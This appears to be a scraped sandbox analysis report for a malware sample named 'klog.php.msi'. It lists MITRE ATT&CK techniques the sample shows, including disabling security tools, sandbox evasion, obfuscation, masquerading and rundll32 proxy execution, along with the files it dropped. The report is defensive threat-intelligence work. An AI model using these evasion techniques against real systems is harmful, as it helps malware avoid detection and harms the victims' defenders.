Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify and/or disable security tools to avoid possible detection of their malware/tools and activities. This may take many forms, such as killing security software processes or services, modifying / deleting Registry keys or configuration files so that tools do not operate properly, or other methods to interfere with security tools scanning or reporting information. Adversaries may also disable updates to prevent the latest security patches from reaching tools on victim systems.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, Driver: Driver Load, Process: Process Creation, Process: Process Termination, Sensor Health: Host Status, Service: Service Metadata, Windows Registry: Windows Registry Key Deletion, Windows Registry: Windows Registry Key Modification
Platforms:	Containers, IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File: File Modification, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Creation, File: File Metadata, Module: Module Load, Process: OS API Execution, Process: Process Creation, Script: Script Execution, WMI: WMI Creation, Windows Registry: Windows Registry Key Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may delete files left behind by the actions of their intrusion activity. Malware, tools, or other non-native files dropped or created on a system by an adversary (ex: Ingress Tool Transfer ) may leave traces to indicate to what was done within a network and how. Removal of these files can occur during an intrusion, or as part of a post-intrusion process to minimize the adversary's footprint.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Deletion
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Metadata, File: File Modification, Image: Image Metadata, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Scheduled Job: Scheduled Job Metadata, Scheduled Job: Scheduled Job Modification, Service: Service Creation, Service: Service Metadata
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse rundll32.exe to proxy execution of malicious code. Using rundll32.exe, vice executing directly (i.e. Shared Modules ), may avoid triggering security tools that may not monitor execution of the rundll32.exe process because of allowlists or false positives from normal operations. Rundll32.exe is commonly associated with executing DLL payloads (ex: `rundll32.exe {DLLname, DLLfunction}` ).
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Metadata, Module: Module Load, Process: Process Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	An adversary may gather the system time and/or time zone from a local or remote system. The system time is set and stored by the Windows Time Service within a domain to maintain time synchronization between systems and services in an enterprise network.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to gather information about attached peripheral devices and components connected to a computer system.Peripheral devices could include auxiliary resources that support a variety of functionalities such as keyboards, printers, cameras, smart card readers, or removable storage. The information may be used to enhance their awareness of the system and network environment or may be used for further actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of valid accounts, usernames, or email addresses on a system or within a compromised environment. This information can help adversaries determine which accounts exist, which can aid in follow-on behavior such as brute-forcing, spear-phishing attacks, or account takeovers (e.g., Valid Accounts ).
Tactics:	Discovery
Data Sources:	Command: Command Execution, File: File Access, Process: Process Creation
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to identify the primary user, currently logged in user, set of users that commonly uses a system, or whether a user is actively using the system. They may do this, for example, by retrieving account usernames or by using OS Credential Dumping . The information may be collected in a number of different ways using other Discovery techniques, because user and username details are prevalent throughout a system and include running process ownership, file/directory ownership, session information, and system logs. Adversaries may use the information from [System Owner/User Discovery](https://attack.mitre.org/techniques/T1033) during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Active Directory: Active Directory Object Access, Command: Command Execution, File: File Access, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow, Process: OS API Execution, Process: Process Access, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may look for details about the network configuration and settings, such as IP and/or MAC addresses, of systems they access or through information discovery of remote systems. Several operating system administration utilities exist that can be used to gather this information. Examples include Arp , ipconfig / ifconfig , nbtstat , and route .
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Creation, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report klog.php.msi

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Threat Intel

Malware Configuration

Yara Signatures

Dropped Files

Memory Dumps

Unpacked PEs

Sigma Signatures

System Summary

Suricata Signatures

Joe Sandbox Signatures

AV Detection

Compliance

Spreading

Networking

System Summary

Data Obfuscation

Persistence and Installation Behavior

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\Config.Msi\58ee4d.rbs

C:\Users\user\8f08\701188\701188.winmd

C:\Users\user\AppData\Roaming\silver\libcurl.dll

C:\Windows\Installer\58ee4b.msi

C:\Windows\Installer\MSIEF45.tmp

C:\Windows\Installer\MSIEFA4.tmp

C:\Windows\Installer\MSIEFD4.tmp

C:\Windows\Installer\MSIF014.tmp

C:\Windows\Installer\MSIF072.tmp

C:\Windows\Installer\SourceHash{77E11148-E1F4-45C0-AAA9-BBA409C05474}

C:\Windows\Installer\inprogressinstallinfo.ipi

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.log

C:\Windows\Temp\~DF05E81200B5245520.TMP

C:\Windows\Temp\~DF10EE077A8D1DA6C9.TMP

C:\Windows\Temp\~DF31F7292E5E50E117.TMP

C:\Windows\Temp\~DF52408E970151573B.TMP

C:\Windows\Temp\~DF529C25150BFF8FC2.TMP

Windows Analysis Report
klog.php.msi

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Tools or files may be copied from an external adversary-controlled system to the victim network through the command and control channel or through alternate protocols such as ftp . Once present, adversaries may also transfer/spread tools between victim devices within a compromised environment (i.e. Lateral Tool Transfer ).
Tactics:	Command and Control
Data Sources:	Command: Command Execution, File: File Creation, Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using a protocol and port pairing that are typically not associated. For example, HTTPS over port 8088or port 587as opposed to the traditional port 443. Adversaries may make changes to the standard port used by a protocol to bypass filtering or muddle analysis/parsing of network data.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use an OSI non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using OSI application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre